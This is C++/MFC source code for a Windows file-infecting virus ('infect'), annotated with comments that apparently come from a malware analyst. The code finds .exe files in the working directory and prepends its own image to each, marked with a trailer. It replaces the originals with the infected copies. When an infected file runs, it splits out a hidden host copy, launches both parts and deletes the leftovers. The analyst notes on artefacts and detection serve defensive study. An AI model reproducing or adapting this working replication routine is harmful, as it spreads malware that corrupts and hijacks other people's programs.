// infectDlg.cpp : implementation file
//
#include "stdafx.h"
#include "infect.h"
#include "infectDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/////////////////////////////////////////////////////////////////////////////
// CInfectDlg dialog
// Constructs the dialog from its IDD resource template. The body only holds
// the ClassWizard placeholder; no members are initialised here.
CInfectDlg::CInfectDlg(CWnd* pParent /*=NULL*/)
    : CDialog(CInfectDlg::IDD, pParent)
{
    //{{AFX_DATA_INIT(CInfectDlg)
        // NOTE: the ClassWizard will add member initialization here
    //}}AFX_DATA_INIT

    // LoadIcon needs no matching DestroyIcon call in Win32.
}
// Binds dialog controls to members: the base class runs first, then the
// ClassWizard-managed map attaches IDC_LIST to m_list.
void CInfectDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);

    //{{AFX_DATA_MAP(CInfectDlg)
    DDX_Control(pDX, IDC_LIST, m_list);
    //}}AFX_DATA_MAP
}
// Message map for CInfectDlg: only the paint and drag-icon queries are routed
// to handlers in this class; everything else falls through to CDialog.
BEGIN_MESSAGE_MAP(CInfectDlg, CDialog)
//{{AFX_MSG_MAP(CInfectDlg)
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CInfectDlg message handlers
// Dialog initialisation. After the wizard-generated icon setup this handler
// runs the program's entire file-modifying logic and then calls exit(0) on
// both paths, so the final "return TRUE" is never reached.
//
// Analyst summary of what the visible code does:
//  1. Resolves its own module path and the current working directory.
//  2. Fills m_list with executable file names via ExeFileFind().
//  3. If its own image carries the BIND_FLAG trailer (IsBind), it splits itself
//     into "infect.exe" and "<own path>.exe", marks the latter hidden+system,
//     runs both in turn and exits.
//  4. Otherwise it calls Bind2File() for every listed file that is neither
//     already marked nor named "infect.exe", then exits.
//
// File-system artefacts visible in this block, useful for triage: a file named
// "infect.exe" in the working directory, a hidden+system file named
// "<own path>.exe", and temporary outputs whose names start with "Bind".
BOOL CInfectDlg::OnInitDialog()
{
CDialog::OnInitDialog();
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
// TODO: Add extra initialization here
// Read this executable's own path
char self[MAX_PATH];
::GetModuleFileName(NULL,self,MAX_PATH);
CString strCurrentFile;
strCurrentFile.Format("%s",self);
// Get the current folder location
char CurrentFolder[MAX_PATH];
::GetCurrentDirectory(MAX_PATH,CurrentFolder);// differs from the other cases
CString strCurrentDir;
strCurrentDir.Format("%s",CurrentFolder);
// Find executable programs (original comment says "under the current drive";
// the argument actually passed is the current working directory)
ExeFileFind(strCurrentDir);
// Determine whether this file itself is a bound (already modified) file
if(IsBind(strCurrentFile))
{
// Define the host file name: own full path with ".exe" appended
CString host;
host=strCurrentFile+".exe";
// First output receives the leading part of this image, second output the
// part recorded in the trailer (see UnBind2File).
UnBind2File(strCurrentFile,"infect.exe",host);
// The restored host copy is hidden from normal directory listings.
SetFileAttributes(host,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
// Both calls pass async=false, so each child is waited for and its file is
// deleted afterwards (see Create_Process).
Create_Process("infect.exe",false);
Create_Process(host,false);
exit(0);
}
// Main body: perform binding
CString strfilename;
int Total=m_list.GetCount();
CString FirstFile,SecondFile,OutFile;
for(int i=0;i<Total;i++)
{
FirstFile = strCurrentFile;
m_list.GetText(i,strfilename);
SecondFile = strfilename;
// List entries are bare file names, so SecondFile and OutFile are resolved
// relative to the current working directory.
OutFile = "Bind"+strfilename;
// Bind only when the selected file is neither the original virus file nor a
// file that already carries the bind flag
if(!IsBind(SecondFile)&&SecondFile!="infect.exe")
Bind2File(FirstFile,SecondFile,OutFile);
}
// The process ends here; the dialog is never shown to the user.
exit(0);
return TRUE; // return TRUE unless you set the focus to a control
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
// WM_PAINT handler: when the dialog is minimised, draw the application icon
// centred in the client area; otherwise defer to the base class.
void CInfectDlg::OnPaint()
{
    if (!IsIconic())
    {
        CDialog::OnPaint();
        return;
    }

    CPaintDC dc(this); // device context for painting
    SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

    // Work out the top-left corner that centres the icon in the client rectangle.
    const int iconWidth = GetSystemMetrics(SM_CXICON);
    const int iconHeight = GetSystemMetrics(SM_CYICON);
    CRect clientArea;
    GetClientRect(&clientArea);
    const int left = (clientArea.Width() - iconWidth + 1) / 2;
    const int top = (clientArea.Height() - iconHeight + 1) / 2;

    dc.DrawIcon(left, top, m_hIcon);
}
// The system calls this to obtain the cursor to display while the user drags
// the minimized window.
// Returns the dialog icon as the cursor shown while the minimised window is
// being dragged.
HCURSOR CInfectDlg::OnQueryDragIcon()
{
    HCURSOR dragCursor = (HCURSOR) m_hIcon;
    return dragCursor;
}
// Concatenates two files into lpszFileOut and appends a BIND_FLAG trailer, then
// replaces lpszFileIn2 with the result.
//
// Resulting layout of the output file, as written below:
//   [ contents of lpszFileIn1 ][ contents of lpszFileIn2 ][ BIND_FLAG ]
// where BIND_FLAG.dwLen is the length of lpszFileIn2 and BIND_FLAG.dwFlag is
// the BINDFLAG constant (both declared outside this file). That fixed-size
// trailer at end-of-file is what IsBind() tests for, so it is also the marker
// an analyst can use to recognise modified files.
//
// Returns TRUE only when all three files opened and the trailer was written.
// Note that the delete/rename at the end runs regardless of that result.
BOOL CInfectDlg::Bind2File(LPCTSTR lpszFileIn1,LPCTSTR lpszFileIn2,LPCTSTR lpszFileOut)
{
BOOL bRet = FALSE;
CFile fileOut, fileIn1, fileIn2;
if(fileOut.Open(lpszFileOut, CFile::modeCreate | CFile::modeWrite | CFile::typeBinary))
{
if(fileIn1.Open(lpszFileIn1, CFile::modeRead | CFile::typeBinary))
{
if(fileIn2.Open(lpszFileIn2, CFile::modeRead | CFile::typeBinary))
{
const int buf_size = 1024;
LPVOID lpBuffer = new BYTE[buf_size];
// Write fileIn1 out to fileOut
while(1)
{
int nReadSize = fileIn1.Read(lpBuffer, buf_size);
fileOut.Write(lpBuffer, nReadSize);
if(nReadSize < buf_size) // a short read means the input is exhausted
break ;
}
// Write fileIn2 out to fileOut
while(1)
{
int nReadSize = fileIn2.Read(lpBuffer, buf_size);
fileOut.Write(lpBuffer, nReadSize);
if(nReadSize < buf_size) // a short read means the input is exhausted
break ;
}
// write bind flag to fileout
BIND_FLAG bf;
bf.dwLen = fileIn2.GetLength();
bf.dwFlag = BINDFLAG;
fileOut.Write(&bf, sizeof(bf));
delete []lpBuffer;
fileIn2.Close();
bRet = TRUE;
}
fileIn1.Close();
}
fileOut.Close();
}
// This else pairs with the outermost if: taken only when the output file could
// not be created.
else DeleteFile(lpszFileOut);
// Unconditional: the original second input is deleted and the output is renamed
// onto its path even when bRet is FALSE, so a failed run can leave the original
// file missing or truncated. Relevant when assessing damage on an affected host.
DeleteFile(lpszFileIn2);
MoveFile(lpszFileOut,lpszFileIn2);
return bRet;
}
// Reports whether a file ends with the BIND_FLAG trailer.
//
// The last sizeof(BIND_FLAG) bytes are read and their dwFlag field is compared
// with BINDFLAG (both declared outside this file). A file that cannot be
// opened, or whose length is not strictly greater than the trailer size, is
// reported as not bound. The same end-of-file test is what identifies files
// this program has modified.
bool CInfectDlg::IsBind(LPCTSTR lpszFile)
{
    CFile candidate;
    if (!candidate.Open(lpszFile, CFile::modeRead | CFile::typeBinary))
        return false;

    bool hasMarker = false;
    if (candidate.GetLength() > sizeof(BIND_FLAG))
    {
        BIND_FLAG trailer;
        ZeroMemory(&trailer, sizeof(trailer));
        // Position on the trailer, counted back from end-of-file.
        candidate.Seek(-1 * (int)sizeof(trailer), CFile::end);
        candidate.Read(&trailer, sizeof(trailer));
        hasMarker = (trailer.dwFlag == BINDFLAG);
    }

    candidate.Close();
    return hasMarker;
}
// Returns 1 when the last three characters of FileName, compared without
// regard to case, are "exe"; otherwise 0. Only those three characters are
// examined; the preceding dot is not checked.
BOOL CInfectDlg::IsExeFile(CString FileName)
{
    CString lowered = FileName;
    lowered.MakeLower();                              // case-insensitive comparison

    const int nameLength = lowered.GetLength();       // length of the file name
    CString suffix = lowered.Mid(nameLength - 3, 3);  // trailing three characters

    return (suffix == "exe") ? 1 : 0;
}
// Enumerates the directory given by str and passes every entry whose name ends
// in "exe" (see IsExeFile) to ExeFileAdd, which stores it in m_list.
//
// Only the bare file name (GetFileName) is stored, not the full path.
// NOTE(review): the branch that would recurse requires an entry to be a "dots"
// entry and not a directory at the same time; that combination looks
// unsatisfiable, so in practice the enumeration appears limited to the starting
// directory. Worth confirming when scoping which files may have been touched.
void CInfectDlg::ExeFileFind(CString str)
{
CString szFileName;
CString szDir=str;
// Build the search pattern "<dir>\*.*"
if (szDir.Right(1)!="\\") szDir+="\\";
szDir+="*.*";
CFileFind ff;
BOOL bfile=ff.FindFile(szDir);
while (bfile)
{
// CFileFind requires FindNextFile before the entry's attributes are queried;
// its return value says whether another entry follows.
bfile=ff.FindNextFile();
if ( !ff.IsDirectory() && ff.IsDots() )
ExeFileFind(ff.GetFilePath());
else if ( !ff.IsDots() && !ff.IsDirectory() )
{
szFileName=ff.GetFileName();
if(IsExeFile(szFileName))// check whether it is an executable program
ExeFileAdd(szFileName);
}
}
ff.Close();
}
// Adds a file name to the m_list list box after stripping surrounding
// whitespace; names that are empty after trimming are ignored.
void CInfectDlg::ExeFileAdd(CString m_add)
{
    m_add.TrimLeft();
    m_add.TrimRight();

    if (m_add.IsEmpty())
        return;

    m_list.AddString(m_add);
}
// Splits a file produced by Bind2File back into its two parts.
//
// Expected input layout (matching what Bind2File writes):
//   [ first part ][ second part, bf.dwLen bytes ][ BIND_FLAG ]
// The first part goes to lpszFileOut1 and the second part to lpszFileOut2.
// Afterwards a fresh BIND_FLAG trailer is appended to lpszFileOut2.
//
// Returns TRUE only when the trailer carried BINDFLAG and the recorded length
// fit inside the input. Both output files are created (truncated) as soon as
// they are opened, before the input is validated.
//
// NOTE(review): the second copy loop reuses the loop variable "i" declared in
// the first for statement, which relies on pre-standard for-scope rules.
BOOL CInfectDlg::UnBind2File(LPCTSTR lpszFileIn, LPCTSTR lpszFileOut1, LPCTSTR lpszFileOut2)
{
BOOL bRet = FALSE;
CFile fileIn, fileOut1, fileOut2;
if(fileOut1.Open(lpszFileOut1, CFile::modeCreate | CFile::modeWrite | CFile::typeBinary))
{
if(fileOut2.Open(lpszFileOut2, CFile::modeCreate | CFile::modeWrite | CFile::typeBinary))
{
if(fileIn.Open(lpszFileIn, CFile::modeRead | CFile::typeBinary))
{
const int nLen = fileIn.GetLength();
// file min size is sizeof(BIND_FLAG)
if(nLen >= sizeof(BIND_FLAG))
{
// Read the trailer from the last sizeof(bf) bytes of the input.
BIND_FLAG bf;
ZeroMemory(&bf, sizeof(bf));
fileIn.Seek(-1 * (int)sizeof(bf), CFile::end);
fileIn.Read(&bf, sizeof(bf));
// check file bind flag, and file length > sizeof(bf) + bf.dwLen
if((bf.dwFlag == BINDFLAG) && (nLen >= (int)(sizeof(bf) + bf.dwLen)))
{
const int buf_size = 1024;
LPVOID lpBuffer = new BYTE[buf_size];
fileIn.SeekToBegin();
// write filein to fileout1
// nWriteLen is the size of the first part: everything before the second
// part and the trailer. It is copied in whole buffers plus one remainder.
int nWriteLen = nLen - bf.dwLen - sizeof(BIND_FLAG);
for(int i = 0; i < (int)nWriteLen / buf_size; i ++)
{
int nReadSize = fileIn.Read(lpBuffer, buf_size);
fileOut1.Write(lpBuffer, nReadSize);
ASSERT(nReadSize == buf_size);
}
if(nWriteLen % buf_size > 0)
{
int nReadSize = fileIn.Read(lpBuffer, nWriteLen % buf_size);
ASSERT(nReadSize == (int)nWriteLen % buf_size);
fileOut1.Write(lpBuffer, nReadSize);
}
// write filein to fileout2
// Reposition to the start of the second part, counted back from end-of-file,
// then copy bf.dwLen bytes the same way.
fileIn.Seek(-1 * (sizeof(bf) + bf.dwLen), CFile::end);
for(i = 0; i < (int)bf.dwLen / buf_size; i ++)
{
int nReadSize = fileIn.Read(lpBuffer, buf_size);
fileOut2.Write(lpBuffer, nReadSize);
ASSERT(nReadSize == buf_size);
}
if(bf.dwLen % buf_size > 0)
{
int nReadSize = fileIn.Read(lpBuffer, bf.dwLen%buf_size);
ASSERT(nReadSize == (int)bf.dwLen % buf_size);
fileOut2.Write(lpBuffer, nReadSize);
}
delete []lpBuffer;
fileIn.Close();
bRet = TRUE;
}
}
// write bind flag to fileout
// Runs whenever the input opened, whether or not the split above happened:
// the second output is given a trailer whose dwLen is that output's current
// length, so IsBind() will report it as marked.
BIND_FLAG bf;
bf.dwLen = fileOut2.GetLength();
bf.dwFlag = BINDFLAG;
fileOut2.Write(&bf, sizeof(bf));
}
fileOut2.Close();
}
fileOut1.Close();
}
return bRet;
}
// Starts temp_exe as a child process with default startup settings.
//
// temp_exe - path of the executable to launch (passed as the application name,
//            with no command line).
// async    - when FALSE the call blocks until the child exits and then deletes
//            temp_exe; when non-zero it returns immediately and leaves the file.
//
// The result of CreateProcess is not checked, and the process and thread
// handles are not closed anywhere in this function. From a monitoring point of
// view the visible pattern is: a freshly written executable is launched by its
// writer and removed as soon as it terminates.
void CInfectDlg::Create_Process(const char *temp_exe, BOOL async)
{
HANDLE hProcess;
HANDLE hThread;
PROCESS_INFORMATION PI;
STARTUPINFO SI;
memset(&SI, 0, sizeof(SI));
SI.cb = sizeof(SI);
CreateProcess(temp_exe,NULL,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,NULL,NULL,&SI,&PI);
hProcess = PI.hProcess;
hThread = PI.hThread;
// When asynchronous, the split-out file is not deleted after execution;
// when synchronous, the split-out file is deleted after execution
if (!async) // synchronous execution
{
WaitForSingleObject(hProcess, INFINITE);
unlink(temp_exe);
}
}